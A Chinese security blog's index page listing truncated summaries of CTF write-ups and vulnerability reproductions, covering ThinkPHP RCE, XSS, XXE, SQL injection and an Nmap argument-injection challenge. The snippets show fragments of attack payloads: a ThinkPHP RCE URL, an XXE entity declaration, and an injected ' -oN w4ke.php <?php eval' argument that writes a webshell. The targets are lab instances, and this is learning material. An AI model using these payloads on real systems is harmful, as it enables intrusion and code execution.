WakeUpp

2020年12月7日

摘要： [ThinkPHP]2-Rce 复现环境搭建 github传送门 BUU传送门 POC 老懒狗选择buu http://node3.buuoj.cn:26104/ poc http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()% 阅读全文

posted @ 2020-12-07 16:21 WakeUpp 阅读(209) 评论(0) 推荐(0) 编辑

[ThinkPHP]5.0.23-Rce 漏洞复现

摘要： [ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu，链接 http://node3.buuoj.cn:27512/ 直接用poc打一下： POST /index.php?s=captcha HTTP/1.1 Host: node3.bu 阅读全文

posted @ 2020-12-07 14:58 WakeUpp 阅读(1659) 评论(0) 推荐(0) 编辑

Thinkphp5 任意代码执行漏洞复现

摘要：环境搭建环境搭建 Github传送门 BUU传送门菜鸡懒得动手直接上buu一键搭建环境 http://node3.buuoj.cn:28078/ POC 首页已经提示thinkphp5了，笔者推荐一款比较好用的谷歌插件Wappalyzer 直接分析出使用了php7.2.31（但是不懂为啥没分析出阅读全文

posted @ 2020-12-07 00:00 WakeUpp 阅读(237) 评论(0) 推荐(0) 编辑

2020年11月27日

[BJDCTF 2nd]xss之光

摘要： [BJDCTF 2nd]xss之光御剑看了一下url，输入啥都不对。掏出御剑直接扫，扫出一个.git GitHack安排得到： <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 原生类反序列化参考构造payload 阅读全文

posted @ 2020-11-27 14:57 WakeUpp 阅读(122) 评论(0) 推荐(0) 编辑

[BJDCTF2020]EasySearch

摘要： [BJDCTF2020]EasySearch 御剑扫一波扫到一个index.php.swp <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01 阅读全文

posted @ 2020-11-27 14:12 WakeUpp 阅读(195) 评论(0) 推荐(1) 编辑

2020年11月18日

PHP学习笔记

摘要： PHP入门 php的四种不同的风格 <?php 代码 ?> 官方推荐风格 <? 代码 ?> 短标记风格，需配置文件php.ini中开启short+open_tag <% 代码 %> ASP风格，需配置文件php.ini中开启asp_tags <script language=”php”> 代码 </ 阅读全文

posted @ 2020-11-18 13:17 WakeUpp 阅读(143) 评论(0) 推荐(0) 编辑

2020年11月15日

[CISCN2019 华北赛区 Day1 Web2]ikun

摘要： [CISCN2019 华北赛区 Day1 Web2]ikun shopping 要买到lv6，然而当前页面上没有lv6，爆破页面来搞事情。 import requests url="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/ 阅读全文

posted @ 2020-11-15 20:31 WakeUpp 阅读(123) 评论(0) 推荐(0) 编辑

[NCTF2019]True XML cookbook

摘要： [NCTF2019]True XML cookbook 爆破抓包爆破，想直接爆出密码。然鹅我天真了。 XXE漏洞这里存在XXE漏洞，利用脚本直接打：构造： <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY fi 阅读全文

posted @ 2020-11-15 17:37 WakeUpp 阅读(960) 评论(0) 推荐(0) 编辑

[极客大挑战 2019]FinalSQL

摘要： [极客大挑战 2019]FinalSQL 先骂出题人出题人是真的狗，废话不多说先放最后爆破的结果： cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.t 阅读全文

posted @ 2020-11-15 14:39 WakeUpp 阅读(470) 评论(0) 推荐(0) 编辑

2020年11月14日

[网鼎杯 2020 朱雀组]Nmap

摘要： [网鼎杯 2020 朱雀组]Nmap nmap 本题的考点是利用nmap的-oN写shell。 nmap -oN xxx.txt 先构造： ' -oN w4ke.txt ' 返回了Host maybe down，然后访问一下w4ke.txt 构造： ' -oN w4ke.php <?php eval 阅读全文

posted @ 2020-11-14 16:24 WakeUpp 阅读(193) 评论(0) 推荐(0) 编辑

公告